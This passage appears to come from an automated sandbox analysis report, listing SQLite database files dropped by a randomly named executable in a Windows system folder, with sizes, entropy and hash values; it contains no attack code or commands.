                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:28591AA4E12D1C4FC761BE7C0A468622
SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:false
Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):106496
Entropy (8bit):1.1358696453229276
Encrypted:false
SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:28591AA4E12D1C4FC761BE7C0A468622
SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:false
Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):49152
Entropy (8bit):0.8180424350137764
Encrypted:false
SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:349E6EB110E34A08924D92F6B334801D
SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
